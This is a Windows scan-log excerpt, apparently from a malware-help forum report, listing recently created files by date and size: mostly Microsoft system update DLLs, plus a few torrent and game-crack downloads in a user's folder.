2015-11-03 19:07 - 2015-11-03 19:07 - 00063177 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.english.dubbed.720p.season.1.8.ep.1.175.torrent
2015-11-01 17:16 - 2015-11-01 17:16 - 00017323 _____ C:\Users\KW\Downloads\[kat.cr]naruto.shippuden.season.6.720p.english.dub.ep.113.143.torrent
2015-11-01 15:44 - 2015-11-01 15:44 - 00089910 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e03.720p.hdtv.x264.killers.torrent
2015-11-01 15:44 - 2015-11-01 15:44 - 00089910 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e03.720p.hdtv.x264.killers (1).torrent
2015-10-23 21:41 - 2015-11-09 20:13 - 00000000 ____D C:\Users\KW\AppData\Roaming\Dark Void
2015-10-23 21:41 - 2015-10-23 21:41 - 00002289 _____ C:\Users\KW\Desktop\Dark Void.lnk
2015-10-23 20:44 - 2015-10-23 20:44 - 00012796 _____ C:\Users\KW\Downloads\[kat.cr]dark.void.repack.r.g.mechanics.torrent
2015-10-17 22:05 - 2015-10-17 22:06 - 18454668 _____ C:\Users\KW\Downloads\Rocket.League.V1.06.Almost.Fully.Working.Online.Fix.V5-RVTFiX.rar
2015-10-17 18:21 - 2015-10-17 18:21 - 00046794 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e01.720p.hdtv.x264.killers.cttv.torrent
2015-10-15 15:44 - 2015-10-15 15:44 - 00000000 ____D C:\Windows\pss
2015-10-14 12:45 - 2015-09-18 13:22 - 00025432 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2015-10-14 12:45 - 2015-09-18 13:19 - 01291264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00766464 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-10-14 12:45 - 2015-09-18 13:09 - 01163776 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-10-13 16:12 - 2015-09-18 13:31 - 00391784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-10-13 16:12 - 2015-09-18 12:58 - 00345688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-10-13 16:12 - 2015-09-15 22:48 - 25851904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-10-13 16:12 - 2015-09-15 22:36 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-10-13 16:12 - 2015-09-15 22:36 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-10-13 16:12 - 2015-09-15 22:22 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 02886656 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00585728 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-10-13 16:12 - 2015-09-15 22:21 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-10-13 16:12 - 2015-09-15 22:14 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-10-13 16:12 - 2015-09-15 22:13 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-10-13 16:12 - 2015-09-15 22:10 - 00616960 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-10-13 16:12 - 2015-09-15 22:09 - 05990912 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-10-13 16:12 - 2015-09-15 22:08 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-10-13 16:12 - 2015-09-15 22:01 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-10-13 16:12 - 2015-09-15 21:58 - 20357632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-10-13 16:12 - 2015-09-15 21:58 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-10-13 16:12 - 2015-09-15 21:50 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-10-13 16:12 - 2015-09-15 21:46 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-10-13 16:12 - 2015-09-15 21:45 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-10-13 16:12 - 2015-09-15 21:45 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-10-13 16:12 - 2015-09-15 21:43 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-10-13 16:12 - 2015-09-15 21:41 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-10-13 16:12 - 2015-09-15 21:33 - 00504832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-10-13 16:12 - 2015-09-15 21:33 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-10-13 16:12 - 2015-09-15 21:32 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-10-13 16:12 - 2015-09-15 21:32 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-10-13 16:12 - 2015-09-15 21:31 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-10-13 16:12 - 2015-09-15 21:31 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-10-13 16:12 - 2015-09-15 21:29 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-10-13 16:12 - 2015-09-15 21:29 - 00720896 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-10-13 16:12 - 2015-09-15 21:28 - 02279936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-10-13 16:12 - 2015-09-15 21:28 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-10-13 16:12 - 2015-09-15 21:26 - 02126336 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-10-13 16:12 - 2015-09-15 21:26 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-10-13 16:12 - 2015-09-15 21:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-10-13 16:12 - 2015-09-15 21:24 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-10-13 16:12 - 2015-09-15 21:23 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-10-13 16:12 - 2015-09-15 21:22 - 14458368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-10-13 16:12 - 2015-09-15 21:22 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-10-13 16:12 - 2015-09-15 21:22 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-10-13 16:12 - 2015-09-15 21:15 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-10-13 16:12 - 2015-09-15 21:11 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-10-13 16:12 - 2015-09-15 21:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-10-13 16:12 - 2015-09-15 21:07 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-10-13 16:12 - 2015-09-15 21:06 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-10-13 16:12 - 2015-09-15 21:05 - 04527616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-10-13 16:12 - 2015-09-15 21:05 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-10-13 16:12 - 2015-09-15 21:04 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-10-13 16:12 - 2015-09-15 20:59 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-10-13 16:12 - 2015-09-15 20:58 - 12853760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-10-13 16:12 - 2015-09-15 20:58 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-10-13 16:12 - 2015-09-15 20:56 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-10-13 16:12 - 2015-09-15 20:55 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-10-13 16:12 - 2015-09-15 20:55 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-10-13 16:12 - 2015-09-15 20:48 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-10-13 16:12 - 2015-09-15 20:37 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-10-13 16:12 - 2015-09-15 20:34 - 01311232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-10-13 16:12 - 2015-09-15 20:32 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-10-13 16:12 - 2015-08-06 12:04 - 14176768 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-10-13 16:12 - 2015-08-06 12:03 - 01866752 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2015-10-13 16:12 - 2015-08-06 11:44 - 12875776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2015-10-13 16:12 - 2015-08-06 11:44 - 01498624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2015-10-13 16:10 - 2015-09-28 21:16 - 05569472 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-10-13 16:10 - 2015-09-28 21:13 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 01216512 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-10-13 16:10 - 2015-09-28 21:10 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-10-13 16:10 - 2015-09-28 21:10 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-10-13 16:10 - 2015-09-28 21:09 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-10-13 16:10 - 2015-09-28 21:09 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 03990976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 03936192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-10-13 16:10 - 2015-09-28 21:05 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-10-13 16:10 - 2015-09-28 21:02 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-10-13 16:10 - 2015-09-28 20:58 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-10-13 16:10 - 2015-09-28 20:58 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2015-10-13 16:10 - 2015-09-28 20:58 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-10-13 16:10 - 2015-09-28 20:58 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-10-13 16:10 - 2015-09-28 20:53 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-10-13 16:10 - 2015-09-28 20:53 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:50 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-10-13 16:10 - 2015-09-28 19:49 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-10-13 16:10 - 2015-09-28 19:49 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-10-13 16:10 - 2015-09-28 19:43 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-10-13 16:10 - 2015-09-28 19:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-10-13 16:10 - 2015-09-28 19:40 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 03168768 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 02607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-10-13 16:10 - 2015-09-25 12:06 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-10-13 16:10 - 2015-09-25 12:06 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-10-13 16:10 - 2015-09-25 12:06 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-10-13 16:10 - 2015-09-25 12:06 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-10-13 16:10 - 2015-09-25 11:58 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-10-13 16:10 - 2015-09-15 12:17 - 00157016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-10-13 16:10 - 2015-09-15 12:17 - 00097112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-10-13 16:10 - 2015-09-15 12:11 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
